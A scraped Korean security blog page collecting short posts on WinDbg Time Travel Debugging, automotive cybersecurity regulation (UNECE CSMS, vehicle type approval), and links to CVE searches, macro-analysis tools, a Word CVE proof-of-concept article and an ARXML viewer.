MS에서 내세우는 TTD의 장점 중 제가 단연 최고라 생각하는 기능은 바로 타임라인입니다. 처음엔 동영상 재생 바처럼 마우스로 드래그하거나 클릭해서 원하는 시점으로 갈 수 있을 줄 알았는데 반은 맞고 반은 틀린 생각이더군요. 전체 프로그램 흐름 중 주요 이벤트(Exception, Break Point, Function Call, Memory Access)의 위치를 그림으로 표현해 주며 타임라인에 표시된 각 이벤트를 클릭하면 프로세스의 상태를 해당 시점으로 변경해줍니다. 그 이외의 곳은 클릭해도 이동 안합니다. ㅎㅎ;; 너무 기대가 컸나?

이벤트 중 Memory Access 같은 경우엔 특정 주소에 특정 동작(RWX)이 이루어질 때마다 타임라인에 기록되도록 지정할 수 있기 때문에 메모리 커럽션 같은 버그를 찾을 때 정말 유용하겠죠? 미디어 플레이어 딱 대

단점

뭐… 사실 단점이라면 단점이지만 앞서 설명한 장점들에 비하면 이 정도는 충분히 감수할 수 있다고 봅니다.

Trace File 크기

위에서 재현에 3~4초 걸리는 버그를 녹화한 결과로 2GB 정도의 디스크 용량을 차지한다고 했었죠? 만약 버그 재현에만 몇십 분을 소모한다고 생각하면 어후…

녹화중 오버헤드

사용하는 시스템의 사양이나 녹화 중 실행하는 코드의 양에 따라 천차만별인 데다 방금 언급한 Trace File의 크기에 직결되는 문제라 웬만하면 최대한 좋은 환경에서 빨리 녹화를 끝내도록 합시다.

Read-only Debugging

당연한 이야기지만 프로세스의 실행을 녹화하고 돌려보는 게 TTD라 다른 디버거들처럼 특정 레지스터나 메모리에 값을 임시로 변경하는 작업은 못해봅니다.

권한

아직까진 TTD로 User-mode 프로세스만 녹화가 가능합니다. Kernel-mode 프로세스는 안된다고 합니다.

마치며

이번 글은 거의 뭐 연구글이라기 보단 번역글 수준에서 끝난 거 같네요. 다음 글에선 실제로 버그를 분석해보는 실습을 해보겠습니다. 아마 구버전 오픈소스에서 발생하는 버그나 MSDOCS에서 TTD 연습용으로 제공하는 프로그램을 사용할 거 같습니다. 아니면 아예 다른 프로그램을 분석해 볼 수도 있고, 아직 정해진 건 없습니다. 그때까지 저는 크래쉬 분석하면서 TTD를 익혀올게요. 취약점도 찾고… ㅎㅎ;;

'경로 및 정보' 카테고리의 다른 글

XSS 우회 패턴 등  (0) 2023.03.20
자동차 양산 단계  (0) 2023.03.17
Vehicel nist  (0) 2023.03.16
향후 자동차 사이버보안 강화를 위해서는  (1) 2023.03.14
매크로 파워쉘  (0) 2023.03.14
블로그 이미지

wtdsoul

,

Vehicel nist

경로 및 정보 2023. 3. 16. 16:56


keyword : vehicle, automotive

 https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=vehicle&search_type=all&isCpeNameSearch=false 
 https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=automotive 

'경로 및 정보' 카테고리의 다른 글

자동차 양산 단계  (0) 2023.03.17
windbg Preview  (0) 2023.03.16
향후 자동차 사이버보안 강화를 위해서는  (1) 2023.03.14
매크로 파워쉘  (0) 2023.03.14
CVE 2023 21716 Poc  (0) 2023.03.10
블로그 이미지

wtdsoul

,

향후 자동차 사이버보안 강화를 위해서는

경로 및 정보 2023. 3. 14. 17:24

사이버보안 위험 평가 능력 내재화 및 보안 요구사항 이행 위한 보안 솔루션 도입 등 필요

[보안뉴스= 고영대 삼정KPMG 컨설팅부문 상무/이유식 이타스코리아 박사] 그동안의 연재를 통해 UNECE 자동차 사이버보안 규제 대응에 대한 필요성과 더불어 자동차 사이버보안 체계 수립에 있어 반드시 필요한 CSMS(Cyber Security Management System)와 VTA(Vehicle Type Approval), 위험평가 및 보안 테스팅에 대해 살펴봤다. 앞서 소개한 UNECE 자동차 사이버보안 규제의 요구사항들을 기초로 마지막 연재에서는 자동차 제조사 및 협력사들이 향후 자동차 사이버보안 체계 강화를 위해 반드시 수행해야 할 사항들에 대해 살펴보고자 한다.

[Automotive Cybersecurity: Are You Ready? 연재순서]
1. UNECE 자동차 사이버보안 규제 대응의 필요성
2. UN 자동차 사이버보안 요구사항 (1): 사이버보안 관리체계, 차량 형식 승인
3. UN 자동차 사이버보안 요구사항 (2): 위험평가, 보안 테스팅
4. 향후 자동차 사이버보안 강화를 위해서는

[이미지=utoimage]


자동차 사이버보안 관리체계 정립을 위한 Security Enhancement
제조 환경을 포함한 국내 대다수 기업 및 조직들의 사이버보안 활동은 주로 IT 인프라 환경을 기반으로 대외로부터의 침해위협 대응과 대내로부터의 정보유출 예방과 방지 중심으로 발전해온 측면이 있다. 이러한 IT 중심의 정보보호 관리체계에서 자동차 업종에 특화된 자동차 사이버보안 체계를 새로이 정립하는 것이 단순히 쉬운 일은 아닐 것이다. 그동안 비교적 사각지대에 속해 있던 차량 기획부터 생산 및 생산 후 과정에 이르는 라이프 사이클(Life Cycle) 전반에 걸친 자동차 사이버보안 관리 활동을 위해서는 우선적으로 다음과 같은 사항들에 대한 고려가 필요하다.

우선, 기존 IT 중심의 정보보호 조직체계의 업무 역할에 대한 재분배를 통해 자동차 사이버보안 관리체계 수립을 위한 유관 부서간 책임과 역할을 재정립할 필요가 있다. 아래 예시에서 보는 바와 같이, 기존 정보보호 조직 내 자동차 사이버보안 관리에 필요한 CSMS 기획 및 운영에 필요한 제반 역할들을 담당할 ‘자동차보안 부서’를 신설하거나, 기존 보안업무 프로세스를 중심으로 유사 영역별 자동차 보안관리 기능을 할당하는 등 여러 가지 옵션을 선택할 수 있을 것으로 보인다. 즉, 자동차 사이버보안 관리체계 전담 부서(파트) 또는 담당자를 두고 이를 중심으로 CSMS를 대응해야 할 것이다.

▲자동차보안 조직 구성안[자료=삼정KPMG/이타스코리아]


조직적인 정비를 수행함과 더불어 당연히 필요한 것은 해당 조직에서 수행해야하 는 업무 프로세스와 이를 위한 세부 규정 또는 지침 마련이다. 자동차 사이버보안 관련 규정 및 지침, 이를 운영하기 위한 세부 가이드라인이 준비되어야 한다. CSMS에서는 자동차 사이버보안 관리체계 운영을 위한 별도의 규정과 세부 업무절차를 마련하도록 의무화하고 있기에 현재 각 기업에서 보유 및 운영하고 있는 정보보호 제반 규정을 보완해 CSMS에서 요구하고 있는 영역별 기능이 포함된 자동차 보안규정을 제·개정해야 한다. 다만, 기존 정보보호 규정을 개정하여 자동차 보안 관련 부분을 포함할 것이냐, 그렇지 않으면 자동차 보안관리 규정을 새로이 제정할 것이냐에 대한 조직 내부 조율이 필요할 것으로 보인다.

▲자동차보안 관리 규정 수립[자료=삼정KPMG/이타스코리아]


국내외 컴플라이언스 및 국제 표준에 대한 지속적인 변화관리
첫 번째 연재 내용인 ’ UNECE 자동차 사이버보안 규제 대응의 필요성’에서도 언급한 바와 같이 UNECE 자동차 사이버보안 규정 시행에 맞춰 국내에서도 자동차 사이버보안 법제화 및 표준 업무 가이드 작업이 국토교통부를 중심으로 진행되고 있다. 해당 표준 작업 방향에 따라 향후 우리나라의 자동차 사이버보안을 위한 컨트롤타워 수립, 중점 추진방향 및 세부 이행 가이드 등 다양한 분야에 대한 변화가 예상되어 이를 지속적으로 모니터링할 필요가 있다. 국내 법제화 및 표준 작업뿐만 아니라, 우리나라와 비슷한 상황에 놓인 중국, 미국, 일본 등과 같은 글로벌 자동차 수출국에 대한 동향 또한 놓쳐서는 안 될 것이다.

▲자동차 사이버보안 관련 제도[자료=삼정KPMG/이타스코리아]


또한, 자동차 사이버보안 국제 표준인 ISO/SAE 21434 규격의 최종 버전(final version)이 올해 초에 곧 배포될 예정에 있다. ISO21434 DIS 규격에 따르면, 일반적으로 널리 알려져 있는 Cyber Security와 관련한 국제 표준을 상당수 참고하고 있다. 정보보호 관리체계 국제표준인 ISO27001, 위험평가와 관련한 ISO31000 뿐만 아니라, OT(Operation Technology) 보안 관리 표준인 ISO62443 등을 그 예로 들 수 있다.

이에 보다 효율적이고 체계적인 UNECE 자동차 사이버보안 규정에 대응하기 위해서는 해당 규정 및 ISO21434 표준 이외에 국내외 각국의 법제화, 표준화 동향 및 전통적인 Cyber Security 표준 제도에도 관심을 기울여야 할 것이다.

자동차 제조사 및 부품 협력사간 사이버보안을 위한 상생 모델 수립
자동차 제조사의 경우, UNECE 자동차 사이버보안 규정 및 ISO21434 표준 이외에 제조사 자체적으로, 협력사가 준수해야할 자동차 사이버보안 표준 항목을 추가하여 보안 수준을 높이려는 움직임을 보이고 있다. 이러한 움직임은 자동차 사이버보안 체계 수립 및 운영을 위해 자동차 제조사와 협력사간 상호 유기적인 보완 활동이 필요하다는 공감에서부터 비롯된다고 볼 수 있다.

▲자동차 제조사 및 협력사간 주요 역할[자료=삼정KPMG/이타스코리아]


자동차 사이버보안 관리의 시작과 안정적 운영을 위해 자동차 제조사의 경우, 제조 및 비즈니스 환경 등을 고려해 부품 협력사와의 자동차 사이버보안 관리 수준 강화를 위한 상호 협력 방안을 만들고, 이를 지원해야 할 것이다. 또한, 부품 협력사의 입장에서도, 자동차 제조사와의 긴밀한 협력 하에 자동차 제조사의 사이버보안 요구사항에 부합하기 위한 내부관리체계를 마련하고 이를 지속적으로 관리해야 할 의무가 있을 것이다.

차량 형식 승인을 위한 실무 역량 강화 및 보안 솔루션 도입
UNECE Regulation No. 155가 말하는 차량 형식 승인의 본질은 사이버 공격으로부터 안전한 차량을 만드는 것이고, 이를 위하여 적절한 보안 기술이 차량에 탑재되어야 함을 의미한다. 어떤 보안 기술이 탑재되어야 하는가는 위험 분석을 통해 식별되며, 보안 시험을 통해 증명될 수 있다. 즉, 차량에 어떤 자산과 위협들이 있는지 식별하고 해당 위협들이 사이버 보안 관점에서 위험한 지 분석한 후, 위험하다고 판단된 위협들을 완화하기 위해 보안조치를 취하게 된다. 그리고 완화시키려한 위협을 공격에 이용하는 모의해킹 등의 보안 시험을 수행하여 해당 위협으로부터 차량이 안전함을 보임으로써 위험 분석 및 보안조치가 적절했음을 증명할 수 있다. 앞서의 과정이 차량 제조사와 협력사 사이에서 적용되는 과정을 살펴보면 다음과 같다.

▲안전성 확보를 위한 아이템 개발 과정[자료=삼정KPMG/이타스코리아]


이상에서 살펴본 바와 같이 차량 형식 승인을 받기 위해서 차량 제조사와 협력사는 긴밀하게 협력해야 하며, 다음과 같은 역량을 갖추고 키워야 한다는 걸 알 수 있다.

- 사이버보안 위험 평가(Risk assessment) 능력 내재화
- 사이버보안 요구사항 이행을 위한 보안 솔루션 도입(HSM, IDS, OTA 등)
- 사이버보안 요구사항 검증을 위한 보안 테스트 수행 및 검증(Fuzzing, Penetration Test 등)

'경로 및 정보' 카테고리의 다른 글

windbg Preview  (0) 2023.03.16
Vehicel nist  (0) 2023.03.16
매크로 파워쉘  (0) 2023.03.14
CVE 2023 21716 Poc  (0) 2023.03.10
arxml-app  (0) 2023.03.09
블로그 이미지

wtdsoul

,

매크로 파워쉘

경로 및 정보 2023. 3. 14. 11:02

파이썬 - 매크로 추출 스크립트 OleVBA.py : 네이버 블로그 (naver.com)

 

파이썬 - 매크로 추출 스크립트 OleVBA.py

MS Office제품 대상으로 VBA매크로 코드를 효과적으로 추출할 수 있는 파이썬 도구를 발견했다. 이미...

blog.naver.com

공유 - https://github.com/rshipp/awesome-malware-analysis : 네이버 블로그 (naver.com)

 

공유 - https://github.com/rshipp/awesome-malware-analysis

출처: https://github.com/rshipp/awesome-malware-analysis 구글링 도중 악성코드 관련 도구 및 정보...

blog.naver.com

악성코드 – 문서형 악성코드 분석(매크로 행위 후 엑셀종료) : 네이버 블로그 (naver.com)

 

악성코드 – 문서형 악성코드 분석(매크로 행위 후 엑셀종료)

문서형 악성코드 매크로 유형을 분석하다 보면 몇 가지 한정적으로 나타난다. (실행형도 마찬가지) 이러한 ...

blog.naver.com

 

'경로 및 정보' 카테고리의 다른 글

Vehicel nist  (0) 2023.03.16
향후 자동차 사이버보안 강화를 위해서는  (1) 2023.03.14
CVE 2023 21716 Poc  (0) 2023.03.10
arxml-app  (0) 2023.03.09
AUTOSAR 기술 이해  (0) 2023.03.09
블로그 이미지

wtdsoul

,

CVE 2023 21716 Poc

경로 및 정보 2023. 3. 10. 17:23

 

Critical Microsoft Word vulnerability CVE-2023-21716 gets a POC (thestack.technology)

 

Critical Microsoft Word vulnerability CVE-2023-21716 gets a POC

A proof-of-concept for CVE-2023-21716 to exploit a critical vulnerability in Microsoft Word requires just three lines of code.

thestack.technology

 

https://github.com/advisories/GHSA-64mm-8wcm-jw5g

 

CVE-2023-21716 - GitHub Advisory Database

Microsoft Word Remote Code Execution Vulnerability

github.com

 

'경로 및 정보' 카테고리의 다른 글

향후 자동차 사이버보안 강화를 위해서는  (1) 2023.03.14
매크로 파워쉘  (0) 2023.03.14
arxml-app  (0) 2023.03.09
AUTOSAR 기술 이해  (0) 2023.03.09
Argus 기사  (0) 2023.03.09
블로그 이미지

wtdsoul

,

arxml-app

경로 및 정보 2023. 3. 9. 15:41

GitHub - mahmut-aksakalli/arxml-viewer: This tool aims to visualize ARXML files in human readable form with easy search operations.

 

GitHub - mahmut-aksakalli/arxml-viewer: This tool aims to visualize ARXML files in human readable form with easy search operatio

This tool aims to visualize ARXML files in human readable form with easy search operations. - GitHub - mahmut-aksakalli/arxml-viewer: This tool aims to visualize ARXML files in human readable form ...

github.com

 

 

'경로 및 정보' 카테고리의 다른 글

매크로 파워쉘  (0) 2023.03.14
CVE 2023 21716 Poc  (0) 2023.03.10
AUTOSAR 기술 이해  (0) 2023.03.09
Argus 기사  (0) 2023.03.09
자동차 버그바운티 경로  (0) 2023.03.07
블로그 이미지

wtdsoul

,

공지사항

태그목록

글 보관함

달력

«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바